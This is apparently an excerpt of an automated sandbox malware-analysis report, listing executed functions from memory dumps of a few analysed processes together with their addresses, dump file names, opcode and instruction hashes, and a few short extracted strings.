                                                                                                                                  • Opcode Fuzzy Hash: 1351c527c6bbf3a3301abab4a072a968eda75cd8f770339bdc104fd130b93b92
                                                                                                                                  • Instruction Fuzzy Hash: F7314732B0E2498EE332EBA898751EC3B70EF92325F4542B7D0588A1E3D9782645C785
                                                                                                                                  Function 00007FFD9BAD0998 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0b4c53e263431580ff756790bcd6a7350b59d00c51635d8202f3020a5bb2b585
                                                                                                                                  • Instruction ID: 28c8794b84b28f8a9b13c081b5b0435c3301d62d44eb13cd6392cd6569b3329b
                                                                                                                                  • Opcode Fuzzy Hash: 0b4c53e263431580ff756790bcd6a7350b59d00c51635d8202f3020a5bb2b585
                                                                                                                                  • Instruction Fuzzy Hash: 3721C820B1DD1D0FE798B76C946A67972C6EBD8225F4102BAE40DC72E7DD589C428281
                                                                                                                                  Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a1894297477b64c5b1ab6776350249781b4f9bd3f7acc6414c721db264d6d844
                                                                                                                                  • Instruction ID: 6bb151378dbcd2ef19f9762d5d4237c8c45b235815426fa7884f8f4fb0875a07
                                                                                                                                  • Opcode Fuzzy Hash: a1894297477b64c5b1ab6776350249781b4f9bd3f7acc6414c721db264d6d844
                                                                                                                                  • Instruction Fuzzy Hash: BC11E131A0E28C8FE722DBA888700DD7FB0EF92611F4642F7D044DB2A2D9382649C784
                                                                                                                                  Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: fbd615fc1cd92589393f636f84e948808f450f7c008ddf920202a0a3e33d3e87
                                                                                                                                  • Instruction ID: 71780355057a422a3d2c2cb3f89c129a1441ddaf7e1e7f16a4da7f98c49e3006
                                                                                                                                  • Opcode Fuzzy Hash: fbd615fc1cd92589393f636f84e948808f450f7c008ddf920202a0a3e33d3e87
                                                                                                                                  • Instruction Fuzzy Hash: 9901D231A0E38C8FE722DBA4C86049C7FB0EF82711F4642E7D054DB2A2D9386644C740
                                                                                                                                  Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2b8b05ac3a117527f4a16ef43bc26c25f2eec3995d145ce7952d1c3a69a9ee9a
                                                                                                                                  • Instruction ID: d3437d9690e84259a7f390c24ea36b5c9d79a8cbf8d10bbd52a707246784248b
                                                                                                                                  • Opcode Fuzzy Hash: 2b8b05ac3a117527f4a16ef43bc26c25f2eec3995d145ce7952d1c3a69a9ee9a
                                                                                                                                  • Instruction Fuzzy Hash: 3101BC30A0E3899FE722DBA4886449C7FB0EF52701F5542E7D054DB2A2D9786A44C744
                                                                                                                                  Function 00007FFD9BAD0B77 Relevance: .0, Instructions: 33COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 415c184c72b7ef7fbc6b5e769c9e8a1437da4489d0232e9a1e6744e5d3a24359
                                                                                                                                  • Instruction ID: f1868246e054c7c103843191999c75127776ddb4e0bb2e536448f7f8eadd0db7
                                                                                                                                  • Opcode Fuzzy Hash: 415c184c72b7ef7fbc6b5e769c9e8a1437da4489d0232e9a1e6744e5d3a24359
                                                                                                                                  • Instruction Fuzzy Hash: 40F0A03425AA49CFC742DB3CC8A54D4BB60FF03204B9A11E9D089CB1B2D325585ECB41
                                                                                                                                  Function 00007FFD9BAD5906 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction ID: cf5034d7decac1468cef45e950861bd935808c5a966124e3e1708efd32e1913f
                                                                                                                                  • Opcode Fuzzy Hash: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction Fuzzy Hash: 1BE0ED30F0D11A8AF774A765D8607B96261EFD4300F5211B5D44E932E2CDB86E418A44
                                                                                                                                  Function 00007FFD9BAD0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction ID: 58d72f4611e8965c6232e1c6fe5a41c2f9ffb9c752a6fc7e1d978368cb27dab2
                                                                                                                                  • Opcode Fuzzy Hash: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction Fuzzy Hash: 5EC08C305218088FC940E72CC88490033A0FB0D210BC201D0E00DC7170E25A9CC0C700
                                                                                                                                  Function 00007FFD9BAD12E8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 97e4949d12f4bf379c18ed64a81d76c03bf9feb7c61c4f8950e032acf1639158
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: BFC08C3051180C8FCA08EB38C88480433A0FF09200BC20190E008C7170E269DCC0CB40
                                                                                                                                  Function 00007FFD9BAD460A Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 69f5bb712046d8c0570060f9558255d4214dd00f1b146711f76ce33920841c31
                                                                                                                                  • Instruction ID: 8ee2d9b85953f60a265b7d4eeda97abae074b313a7937c730c1f46ed7982c77a
                                                                                                                                  • Opcode Fuzzy Hash: 69f5bb712046d8c0570060f9558255d4214dd00f1b146711f76ce33920841c31
                                                                                                                                  • Instruction Fuzzy Hash: 2EC08C00F0CC1A02F21922040422A7D04024F8431CFC40138F00ECB2CECF2C5A0202C6
                                                                                                                                  Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000026.00000002.2115595602.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_38_2_7ffd9bad0000_bridgeportDhcpcommon.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ff241fe3d1445e0c9a235275b143493ed76da9adaf01aed60a49a3c6d8f9f3ff
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 7EB01204D5740F00E87433FA086606870509BC4100FC20270D40C8019198CD12941246

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFD9BAA0D74 Relevance: .3, Instructions: 266COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4f0da1f12caacef55b6137ed39d7808241409e6357334d118c06e40b0bc2c138
                                                                                                                                  • Instruction ID: dbf188898a153de908f8d605218e664bacbffdfbc534e2376bd3ce85339fbaf9
                                                                                                                                  • Opcode Fuzzy Hash: 4f0da1f12caacef55b6137ed39d7808241409e6357334d118c06e40b0bc2c138
                                                                                                                                  • Instruction Fuzzy Hash: 6891E076A18A8D4FE798DB6C88657A97FE1FF99314F4001BEE14AD72E6CB781811C700
                                                                                                                                  Function 00007FFD9BAA0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: c9$!k9$"s9
                                                                                                                                  • API String ID: 0-3426396564
                                                                                                                                  • Opcode ID: 4470e08967ed613b296afce63408d3fd13e033ffe4afc30e5f06ef80efccf24c
                                                                                                                                  • Instruction ID: 686306be4a690df05e0852d15206d5b05897dfacf84590a8f7bf2564703c99ef
                                                                                                                                  • Opcode Fuzzy Hash: 4470e08967ed613b296afce63408d3fd13e033ffe4afc30e5f06ef80efccf24c
                                                                                                                                  • Instruction Fuzzy Hash: F801F73A3299568FC611AB3EA4905D8BB50EAC2135B8601B7D144CB1A1E2101C9EC7E0
                                                                                                                                  Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 156COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 598dbb9a028e22202b6003036dd8f161d475d632e142db5f7e91941ff23bd99b
                                                                                                                                  • Instruction ID: e12426cb6d02199ace8121d43c2f795cf41a7834adbc22ab10a5106917567d0f
                                                                                                                                  • Opcode Fuzzy Hash: 598dbb9a028e22202b6003036dd8f161d475d632e142db5f7e91941ff23bd99b
                                                                                                                                  • Instruction Fuzzy Hash: B8411922B0C5190AE368F7AC64A5AF97781DF9833AF0445BFE44ECB1D7DD18AC41C284
                                                                                                                                  Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 96COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e12e94acfc44ff73376933be4d8a5d12ffc929786acb0b48fb6cd8d940d5f4ac
                                                                                                                                  • Instruction ID: a24e0b798495c3b2d219fd88340e14f3d56be19f2ff7465534514086e157fff3
                                                                                                                                  • Opcode Fuzzy Hash: e12e94acfc44ff73376933be4d8a5d12ffc929786acb0b48fb6cd8d940d5f4ac
                                                                                                                                  • Instruction Fuzzy Hash: 75312736B0E2498AE732EBA888611EC7B61EF41725F0541B7D05C8A1D3D9782689C765
                                                                                                                                  Function 00007FFD9BAA0998 Relevance: .1, Instructions: 94COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8eceb56e448824c323903438ef786ead217625e15186fbc3c99f1c55182ffab0
                                                                                                                                  • Instruction ID: 0788ee4ea4f365e9e116e70dab64c7c8f8544dd46f8e2bcb2b30dc92bdd18bf6
                                                                                                                                  • Opcode Fuzzy Hash: 8eceb56e448824c323903438ef786ead217625e15186fbc3c99f1c55182ffab0
                                                                                                                                  • Instruction Fuzzy Hash: E3212920B1891D0FE798F76C986A67976C3EF98325F4000BEE40EC32E7DD54EC028291
                                                                                                                                  Function 00007FFD9BAA0C40 Relevance: .1, Instructions: 51COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction ID: 2fd90356b865a35136ea2973926417c0e99dfe7ab35acf3027c41e9a90ee891d
                                                                                                                                  • Opcode Fuzzy Hash: f99356922026e6e880ee7a92bad2d9d45a1a3b36c901df894e745226f9e58d5a
                                                                                                                                  • Instruction Fuzzy Hash: 8611A136A0E28D8FE722DFA888601DD7FB1EF42711F0645F7D048DB1A2D97466498764
                                                                                                                                  Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction ID: 29b7ff40235aed8ed58873bd8658f74a1c50275defc08408daf90b1810143e1e
                                                                                                                                  • Opcode Fuzzy Hash: 2a26a3ebc4bc9e74145091e1032dcb3bb35e2874727d4901efe39f9149ec395b
                                                                                                                                  • Instruction Fuzzy Hash: B4019235A0E38D9FE721DFA4C85049CBFB1EF02710F1641E7D048DB1A2D9746645C754
                                                                                                                                  Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction ID: 3cddbe00afb4ff431c128674d65695716683e5987107ee65f5c6ba0062407818
                                                                                                                                  • Opcode Fuzzy Hash: 7332ddb06a322b94d9d1a086d782e2bd0ebfe3b8b6f5b591155510d7e2697513
                                                                                                                                  • Instruction Fuzzy Hash: 4201BC31A0E38D9FEB21DFA488A049CBFB1AF02700F1542E7D048CB2A3D9786A448754
                                                                                                                                  Function 00007FFD9BAA0B77 Relevance: .0, Instructions: 34COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction ID: aad96e1d7d97b683b76d1842787eed33bcf2f0f51b8489067d4b27900bf4e650
                                                                                                                                  • Opcode Fuzzy Hash: d89311434c9708ba25c6d473b2a50db4ece3f4970cc5127e1b5a28fbf1ec18f8
                                                                                                                                  • Instruction Fuzzy Hash: 88F0A03925EA49CFC742EB3DC8A58C4BB60FF02204B8A01FAD089CB5A2D3155C5ECB51
                                                                                                                                  Function 00007FFD9BAA5906 Relevance: .0, Instructions: 21COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction ID: d7e3dd96e30b9d43b5d2dc38ed30cab640a7ab2438f1c62fc4c931b52efdf37b
                                                                                                                                  • Opcode Fuzzy Hash: 54b3bdfac85337088c07613df5ecb4cd6b6a46193c3aa62ab90cf3e95458920a
                                                                                                                                  • Instruction Fuzzy Hash: 93E01230F0D11E8AF774A755D8607B962629F94704F5600B5D40ED32E2DDB86F418A55
                                                                                                                                  Function 00007FFD9BAA0B18 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction ID: 39ae7c3307a973fb3895cf3b728150e803e3f5b97c6d35a82a3f5e8e7e55929d
                                                                                                                                  • Opcode Fuzzy Hash: 0f4f05a223ffb7b3a8a748953fa134ab67674250fd60c56fd708e36b549a1ad9
                                                                                                                                  • Instruction Fuzzy Hash: 7FC04C305218098FC994E76DC98595477A0FB0D215BD60190E44DC7171E65AADD5C741
                                                                                                                                  Function 00007FFD9BAA12E8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction ID: 15a2d76f2acc1e229c8467994c8db05a7fe7b6cb91a23be4982a98db52c93475
                                                                                                                                  • Opcode Fuzzy Hash: 2412635f2e828563d32fe7f20a8f0098534477af7fc25eb0cb89cbd3628c561b
                                                                                                                                  • Instruction Fuzzy Hash: 5BC08C3051180D8FCA48EB28C88481433E0FB0D200FC20090E008C7170E269DCC0CB40
                                                                                                                                  Function 00007FFD9BAA460A Relevance: .0, Instructions: 10COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 04d398a4e3498b0c8f8e3e8d5efa6b2ea8f6cf5a71dc55b4f6a9dacd6834987d
                                                                                                                                  • Instruction ID: 13084b5f33aa7ef52ab2cf5f8ee66df761be9771b02429f150f67de6551731fe
                                                                                                                                  • Opcode Fuzzy Hash: 04d398a4e3498b0c8f8e3e8d5efa6b2ea8f6cf5a71dc55b4f6a9dacd6834987d
                                                                                                                                  • Instruction Fuzzy Hash: BFC08C01F0CC1A12F25922040821A7D08024F4471CF880034F10EC72CECE1C5A0202C6
                                                                                                                                  Function 00007FFD9BAA06C8 Relevance: .0, Instructions: 8COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000027.00000002.2086548046.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_39_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction ID: ed2ad82ac794e93c54508d1dd081e88639fcab4bd9146968243794078dba2c1c
                                                                                                                                  • Opcode Fuzzy Hash: 4c899b50f76bdc8ca6145acde5f31984b735bdcc3b09d9e8938d1509e74ff910
                                                                                                                                  • Instruction Fuzzy Hash: 2BB01200D5740F00E47433FA08A206870415B44200FC20070D40C8019198CE22980277

                                                                                                                                  Executed Functions

                                                                                                                                  Function 00007FFD9BAB0566 Relevance: 2.0, Instructions: 2033COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9bab0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 2c95157bfa868442b5157fd24a56b21f4e885d199a0fec471ac2635aceea7b26
                                                                                                                                  • Instruction ID: 685052d591bc592c2d4a05fd945a0bacff3e97cd460aa81a7c177293ace483a3
                                                                                                                                  • Opcode Fuzzy Hash: 2c95157bfa868442b5157fd24a56b21f4e885d199a0fec471ac2635aceea7b26
                                                                                                                                  • Instruction Fuzzy Hash: 90E2B331B1991E4FEBA8EB5884B17B87392FFA8340F1545B9D01DC72E6DE64BD418B80
                                                                                                                                  Function 00007FFD9BAA0B3F Relevance: 3.8, Strings: 3, Instructions: 54COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000002A.00000002.2176440524.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_42_2_7ffd9baa0000_iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
